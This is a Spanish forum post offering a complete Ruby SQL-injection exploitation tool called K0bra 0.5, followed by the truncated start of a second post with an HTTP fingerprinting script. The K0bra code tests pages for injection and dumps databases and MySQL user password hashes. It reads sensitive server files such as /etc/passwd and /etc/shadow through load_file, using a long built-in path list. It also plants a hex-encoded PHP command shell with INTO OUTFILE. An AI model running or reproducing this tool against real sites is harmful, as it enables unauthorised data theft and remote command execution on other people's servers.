1  Programación / Scripting / [Ruby] K0bra 0.5 en: 24 Julio 2015, 18:12
Versión mejorada de este script en Ruby para escanear la vulnerabilidad SQLi en una página.

El script tiene las siguientes opciones :

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostrar tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados

El codigo :

Código
  1. #!usr/bin/ruby
  2. #K0bra 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "net/http"
  6. require "open-uri"
  7.  
  8. $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log
','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','
/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my
.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
  9.  
  10. def toma(web)
  11.  begin
  12.    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  13.  rescue
  14.    return "Error"
  15.  end
  16. end
  17.  
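  # Decode a hex literal such as "0x4b30425241" back into its text form.
  #
  # text - String of hex digits, optionally prefixed with "0x".
  #
  # Returns the complete decoded String. The earlier version indexed the
  # packed result with [0], which kept only its first character.
  def decode_hex(text)
    digits = text.sub("0x","")
    return [digits].pack('H*')
  end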
  22.  
  # Render a string as a "0x"-prefixed lowercase hex literal.
  #
  # text - String to encode.
  #
  # Returns "0x" followed by two hex digits per byte of text.
  def encode_hex(text)
    hex_digits = text.unpack('H*').first
    "0x" + hex_digits
  end
  26.  
  # Print the closing banner, wait for Enter, then end the process.
  # NOTE(review): the exit status is 1 even on a normal quit.
  def copyright()
    banner = "\n-- == (C) Doddy Hackman 2015 == --\n"
    $stdout.print banner
    gets.chomp
    exit(1)
  end
  32.  
  # Make sure the logs_webs directory exists under the current directory.
  def installer()
    log_dir = "#{Dir.pwd}/logs_webs"
    Dir.mkdir(log_dir) unless File.directory?(log_dir)
  end
  39.  
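  # Append one entry to the per-host log file under logs_webs/.
  #
  # file - URL string; only its host part is used to name the log file.
  # text - String to append; a newline is added after it.
  #
  # The log receives whatever the callers collected (elsewhere in this
  # script that includes database user names and password values), so a
  # newly created file is made readable by its owner only. The block form
  # closes the handle even when the write raises, which the separate
  # open/close calls did not.
  def savefile(file,text)
    host = URI.parse(file).host
    File.open("logs_webs/"+host+".txt", "a", 0o600) do |log|
      log.puts text+"\n"
    end
  end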
  46.  
  47. def bypass(op)
  48.  if op=="--"
  49.    return "+","--"
  50.  elsif op=="/*"
  51.   return "/**/","/**/"
  52.  elsif op=="%20"
  53.   return "%20","%00"
  54.  else
  55.   return "+","--"    
  56.  end
  57. end
  58.  
  59. def head()
  60.  clean()
  61.  print "
  62.  
  63. @      @@   @            
  64. @@     @  @ @@            
  65. @ @@  @  @  @ @   @ @ @@@
  66. @ @   @  @  @@ @ @@@ @  @
  67. @@    @  @  @  @  @   @@@
  68. @ @   @  @  @  @  @  @  @
  69. @@@ @   @@   @@@  @@@ @@@@@
  70.  
  71. "
  72. end
  73.  
  # Pause until the user presses Enter, then go back to the start prompt.
  def volverinicio()
    prompt = "\n\n[+] Press any key to continue\n\n"
    $stdout.print prompt
    gets.chomp
    inicio()
  end
  79.  
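  # Clear the terminal with the platform's own command.
  #
  # The platform test names the Windows builds explicitly (mswin, mingw).
  # The previous /win/ pattern also matched "darwin", so macOS ran "cls"
  # instead of "clear".
  def clean()
    if RUBY_PLATFORM =~ /mswin|mingw/
      system("cls")
    else
      system("clear")
    end
  end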
  87.  
  # Report that an action finished, wait for Enter, then show the menu
  # again for the same page and bypass setting.
  def retorno(url,by)
    $stdout.print "\n[+] Finished"
    $stdout.print "\n\n[+] Press any key to continue\n\n"
    gets.chomp
    central(url,by)
  end
  94.  
  95. def gettables(url,by)
  96.  pass1,pass2 = bypass(by)
  97.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  98.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  99.  print "\n[+] Getting tables ...\n\n"
  100.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  101.  if code1=~/K0BRA(.*?)K0BRA/
  102.    total = $1
  103.    print "[+] Tables Found : ",total,"\n\n"
  104.    savefile(url,"\n[+] Tables Found : #{total}\n")
  105.    for num in ("17"..total)
  106.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
  107.      if code2=~/K0BRA(.*?)K0BRA/
  108.        table = $1
  109.        print "[+] Table Found : "+table+"\n"
  110.        savefile(url,"[+] Table Found : #{table}")
  111.      end
  112.    end
  113.  else
  114.    print "[-] Not Found\n"
  115.  end
  116. end
  117.  
  118. def getcolumns(url,by,tablex)
  119.  tablexa = encode_hex(tablex)
  120.  pass1,pass2 = bypass(by)
  121.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  122.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  123.  print "\n[+] Getting columns ...\n\n"
  124.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  125.  if code1=~/K0BRA(.*?)K0BRA/
  126.    total = $1
  127.    print "[+] Columns Found : ",total,"\n\n"
  128.    savefile(url,"\n[+] Table : #{tablex}")
  129.    savefile(url,"[+] Columns Found : #{total}\n")
  130.    for num in ("0"..total)
  131.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
  132.      if code2=~/K0BRA(.*?)K0BRA/
  133.        table = $1
  134.        print "[+] Column Found : "+table+"\n"
  135.        savefile(url,"[+] Column Found : #{table}")
  136.      end
  137.    end
  138.  else
  139.    print "[-] Not Found\n"
  140.  end
  141. end
  142.  
  143. def getdbs(url,by)
  144.  pass1,pass2 = bypass(by)
  145.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  146.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  147.  print "\n[+] Getting DBS ...\n\n"
  148.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  149.  if code1=~/K0BRA(.*?)K0BRA/
  150.    total = $1
  151.    print "[+] DBS Found : ",total,"\n\n"
  152.    savefile(url,"\n[+] DBS Found : #{total}\n")
  153.    for num in ("0"..total)
  154.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
  155.      if code2=~/K0BRA(.*?)K0BRA/
  156.        table = $1
  157.        print "[+] DB Found : "+table+"\n"
  158.        savefile(url,"[+] DB Found : #{table}")
  159.      end
  160.    end
  161.  else
  162.    print "[-] Not Found\n"
  163.  end
  164. end
  165.  
  166. def gettablesbydb(url,by,dbx)
  167.  data  = encode_hex(dbx)
  168.  pass1,pass2 = bypass(by)
  169.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  170.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  171.  print "\n[+] Getting tables ...\n\n"
  172.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  173.  if code1=~/K0BRA(.*?)K0BRA/
  174.    total = $1
  175.    print "[+] Tables Found : ",total,"\n\n"
  176.    savefile(url,"\n[+] DBS : #{dbx}")
  177.    savefile(url,"[+] Tables Found : #{total}\n")
  178.    for num in ("0"..total)
  179.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  180.      if code2=~/K0BRA(.*?)K0BRA/
  181.        table = $1
  182.        print "[+] Table Found : "+table+"\n"
  183.        savefile(url,"[+] Table Found : #{table}")
  184.      end
  185.    end
  186.  else
  187.    print "[-] Not Found\n"
  188.  end
  189. end
  190.  
  191. def getcolumnsbydb(url,by,db,tab)
  192.  data = encode_hex(db)
  193.  tabx = encode_hex(tab)
  194.  
  195.  pass1,pass2 = bypass(by)
  196.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  197.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  198.  print "\n[+] Getting columns ...\n\n"
  199.  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  200.  if code1=~/K0BRA(.*?)K0BRA/
  201.    total = $1
  202.    print "[+] Columns Found : ",total,"\n\n"
  203.    savefile(url,"\n[+] DB : #{db}")
  204.    savefile(url,"[+] Table : #{tab}")
  205.    savefile(url,"[+] Columns Found : #{total}\n")
  206.    for num in ("0"..total)
  207.      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
  208.      if code2=~/K0BRA(.*?)K0BRA/
  209.        table = $1
  210.        print "[+] Column Found : "+table+"\n"
  211.        savefile(url,"[+] Column Found : #{table}")
  212.      end
  213.    end
  214.  else
  215.    print "[-] Not Found\n"
  216.  end
  217. end
  218.  
  219. def mysqluser(url,by)
  220.  pass1,pass2 = bypass(by)
  221.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  222.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  223.   print "\n[+] Searching mysql.user\n\n"
  224.  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  225.  if code1=~/K0BRA(.*?)K0BRA/
  226.    total = $1
  227.    print "[+] Users Mysql Found : ",total,"\n\n"
  228.    savefile(url,"[+] Users Mysql Found : "+total+"\n")
  229.    for num in ("0"..total)
  230.      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
  231.      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
  232.        host,user,passw = $1,$2,$3
  233.        print "[Host] : "+host
  234.        print " [User] : "+user
  235.        print " [Pass] : "+passw+"\n"  
  236.        savefile(url,"[Host] : "+host)
  237.        savefile(url,"[User] : "+user)
  238.        savefile(url,"[Pass] : "+passw+"\n")
  239.      end
  240.    end
  241.  else
  242.    print "[-] Not Found\n"
  243.  end
  244. end
  245.  
  246. def details(url,by)
  247.  pass1,pass2 = bypass(by)
  248.  hextest = "0x2f6574632f706173737764" #/etc/passwd
  249.  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  250.  web1 = url.sub(/hackman/,"0x4b30425241")
  251.  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  252.  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  253.   print "\n[+] Extrating information of the DB\n"
  254.  code1 = toma(web2)
  255.  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
  256.    user,data,ver = $1,$2,$3
  257.    print "\n[+] Username : "+user
  258.    print "\n[+] Database : "+data
  259.    print "\n[+] Version : "+ver+"\n\n"
  260.    savefile(url,"\n[+] Username : "+user)
  261.    savefile(url,"[+] Database : "+data)
  262.    savefile(url,"[+] Version : "+ver+"\n")
  263.  else
  264.    print "[-] Not Found\n"
  265.  end
  266.   code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  267.   code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  268.   code4 = toma(web3)
  269.   if code2=~/K0BRA/
  270.     print "[+] Mysql User : ON\n"
  271.     savefile(url,"[+] Mysqluser : ON")
  272.   end
  273.   if code3=~/K0BRA/
  274.     print "[+] information_schema : ON\n"
  275.     savefile(url,"[+] information_schema : ON")
  276.   end
  277.   if code4=~/ERTOR854/
  278.     print "[+] load_file : ON\n"
  279.     savefile(url,"[+] load_file : ON")
  280.   end  
  281.   savefile(url,"") #espacio en blanco
  282. end
  283.  
  284. def dumper(url,by,table,col1,col2)
  285.  pass1,pass2 = bypass(by)
  286.  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  287.  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  288.  print "\n[+] Getting Values ...\n\n"
  289.  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  290.  if code1=~/K0BRA(.*?)K0BRA/
  291.    total = $1
  292.    savefile(url,"\n[+] Table : "+table)
  293.    savefile(url,"[+] Column 1 : "+col1)
  294.    savefile(url,"[+] Column 2 : "+col2)
  295.    print "[+] Values Found : ",total,"\n"
  296.    savefile(url,"\n[+] Values Found : #{total}\n")
  297.    for num in ("0"..total)
  298.      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
  299.      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
  300.        uno,dos = $1,$2
  301.        print "\n[+] "+col1+" : "+uno+"\n"
  302.        print "[+] "+col2+" : "+dos+"\n"
  303.        savefile(url,"\n[+] "+col1+" : "+uno)
  304.        savefile(url,"[+] "+col2+" : "+dos)
  305.      end
  306.    end
  307.  else
  308.    print "[-] Not Found\n"
  309.  end
  310. end
  311.  
  312. def fuzzfile(url,by)
  313.  pass1,pass2 = bypass(by)
  314.  print "\n[+] Fuzzing Files with load_file ....\n"
  315.  $files.each do |file|
  316.    res = file
  317.    file = file.chomp
  318.    file = encode_hex(file)
  319.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  320.    code = toma(web1)
  321.    if code=~/ERTOR854(.*?)ERTOR854/m
  322.      print "\n\n[File Found] : ",res
  323.      print "\n\n[Source Start]\n"
  324.      print $1
  325.      print "\n[Source End]"
  326.      savefile(url,"\n[File Found] : "+res)
  327.      savefile(url,"\n[Source Start]\n")
  328.      savefile(url,$1)
  329.      savefile(url,"\n[Source End]")
  330.    end    
  331.  end
  332.  print "\n"
  333. end
  334.  
  335. def abrirfile(url,by,file)
  336.  pass1,pass2 = bypass(by)
  337.  print "\n[+] Opening file ....\n"
  338.  res = file
  339.  file = encode_hex(file)
  340.    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  341.    code = toma(web1)
  342.    if code=~/ERTOR854(.*?)ERTOR854/m
  343.      print "\n\n[File Found] : ",res
  344.      print "\n\n[Source Start]\n"
  345.      print $1
  346.      print "\n[Source End]\n"
  347.      savefile(url,"\n[File Found] : "+res)
  348.      savefile(url,"\n[Source Start]\n")
  349.      savefile(url,$1)
  350.      savefile(url,"\n[Source End]\n")
  351.    else
  352.      print "\n\n[-] Error\n\n"
  353.    end
  354.  
  355. end
  356.  
  357. def into(url,by,full,dir)
  358.  pass1,pass2 = bypass(by)
  359.  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  360.  lugar = full+"/cmd.php"
  361.  lugardos = dir+"/cmd.php"
  362.  h = URI.parse(url)
  363.  webtest = "http://"+h.host+lugardos
  364.  web1 = url.sub(/hackman/,linea)
  365.  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  366.  toma(formandoweb)
  367.  code = toma(webtest)
  368.  if code=~/Mini Shell By Doddy/
  369.    print "\n[Shell Up] : "+webtest+"\n"
  370.    savefile(url,"\n[Shell Up] : "+webtest+"\n")
  371.  else
  372.    print "\n\n[-] Error\n"
  373.  end
  374. end
  375.  
  376. def central(url,by)
  377.  clean()
  378.  head()
  379.  print "\n\n[+] Page : #{url}\n"
  380.  print "[+] ByPass : #{by}\n\n"
  381.  
  382.  print "\n[information_schema]\n\n"
  383.  print "1 - Show tables\n"
  384.  print "2 - Show columns of the a table\n"
  385.  print "3 - Show databases\n"
  386.  print "4 - Show tables from the a DB\n"
  387.  print "5 - Show columns from the a table of the DB\n"
  388.  print "\n[mysql.user]\n\n"
  389.  print "6 - Show users\n"
  390.  print "\n[Others]\n\n"
  391.  print "7 - Show details\n"
  392.  print "8 - Dump data\n"
  393.  print "9 - Fuzz Files with load_file\n"
  394.  print "10 - Load files with load_file\n"
  395.  print "11 - Create Shell\n"
  396.  print "12 - Show log\n"
  397.  print "13 - Change target\n"
  398.  print "14 - Exit\n\n\n"
  399.  
  400.  print "[+] Option : "
  401.  op = gets.chomp
  402.  print "\n"
  403.  
  404.  if op == "1"
  405.    gettables(url,by)
  406.    retorno(url,by)
  407.  elsif op == "2"
  408.    print "\n[+] Table : "
  409.    table = gets.chomp
  410.    getcolumns(url,by,table)
  411.    retorno(url,by)
  412.  elsif op == "3"
  413.    getdbs(url,by)
  414.    retorno(url,by)
  415.  elsif op == "4"
  416.    print "\n[+] DB : "
  417.    db = gets.chomp
  418.    gettablesbydb(url,by,db)
  419.    retorno(url,by)
  420.  elsif op == "5"
  421.    print "\n[+] DB : "
  422.    db = gets.chomp
  423.    print "\n[+] Table : "
  424.    tab = gets.chomp
  425.    getcolumnsbydb(url,by,db,tab)
  426.    retorno(url,by)
  427.  elsif op == "6"
  428.    mysqluser(url,by)
  429.    retorno(url,by)
  430.  elsif op == "7"
  431.    details(url,by)
  432.    retorno(url,by)
  433.  elsif op == "8"
  434.    print "\n[+] Table : "
  435.    table = gets.chomp
  436.    print "\n[+] Column 1 : "
  437.    col1 = gets.chomp
  438.    print "\n[+] Column 2 : "
  439.    col2 = gets.chomp
  440.    dumper(url,by,table,col1,col2)
  441.    retorno(url,by)
  442.  elsif op == "9"
  443.    fuzzfile(url,by)
  444.    retorno(url,by)
  445.  elsif op == "10"
  446.    print "\n[+] File : "
  447.    file = gets.chomp
  448.    abrirfile(url,by,file)
  449.    retorno(url,by)
  450.  elsif op == "11"
  451.    print "\n[Full Source Discloure] : "
  452.    full = gets.chomp
  453.    print "\n[Directory to test] : "
  454.    dir = gets.chomp
  455.    into(url,by,full,dir)
  456.    retorno(url,by)
  457.  elsif op == "12"
  458.    urla = URI.parse(url)
  459.    ar = "logs_webs/"+urla.host+".txt"
  460.    system("start #{ar}")
  461.    retorno(url,by)
  462.  elsif op == "13"
  463.    inicio()
  464.  elsif op == "14"
  465.    copyright()
  466.  else
  467.    retorno(url,by)
  468.  end
  469. end
  470.  
  471. def findlength(url,by)
  472.  pass1,pass2 = bypass(by)
  473.  z = "1"
  474.  print "\n[+] Finding columns lenght ...\n\n"
  475.  x = "concat(0x4b30425241,1,0x4b30425241)"
  476.  for num in ('2'..'25')
  477.    z = z+","+num
  478.    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
  479.    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
  480.    if code=~/K0BRA(.*?)K0BRA/
  481.      print "[+] The Page has "+num+" columns\n"
  482.      print "[+] The number "+$1+" print data"
  483.      z = z.sub($1,"hackman")
  484.      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
  485.      savefile(url,"[+] SQLI : "+sqli)
  486.      savefile(url,"[+] Bypass : "+by+"\n")
  487.      central(sqli,by)
  488.    end
  489.  end
  490.  print "[-] Columns lenght not found\n"
  491.  volverinicio()
  492. end
  493.  
  494. def testvul(page,by)
  495.  pass1,pass2 = bypass(by)
  496.  print "\n\n[+] Testing vulnerability ...\n\n"
  497.  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  498.  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  499.  if codeuno != codedos
  500.    print "[+] Vulnerable !\n"
  501.    findlength(page,by)
  502.  else
  503.    print "[-] Not vulnerable\n"
  504.    print "\n[+] Scan anyway y/n : "
  505.    op = gets.chomp
  506.    if op == "y"
  507.      findlength(page,by)
  508.    else
  509.      volverinicio()
  510.  end
  511. end  
  512. end
  513.  
  514. def inicio()
  515.  clean()
  516.  head()
  517.  print "\n\n[+] Page : "
  518.  page = gets.chomp
  519.  print "\n[+] Bypass : "
  520.  by = gets.chomp
  521.  if page=~/hackman/
  522.    central(page,by)
  523.  else
  524.    testvul(page,by)
  525.  end
  526. end
  527.  
  528. installer()
  529. inicio()
  530.  
  531. # The End ?
  532.  

Eso es todo.
2  Programación / Scripting / [Ruby] HTTP FingerPrinting 0.2 en: 12 Julio 2015, 17:27
Un simple script en Ruby para hacer HTTP FingerPrinting.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #HTTP FingerPrinting 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "net/http"
  6.  
  7. # Functions
  8.  
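  # Send a HEAD request for "/" to a host and list the response headers.
  #
  # page - host name or address, without scheme or path.
  #
  # Returns one "[+] name : value" line per header, or the string "Error"
  # when the request fails for any reason.
  def httpfinger(page)
    respuesta = ""
    begin
      # The block form closes the connection on every path; the explicit
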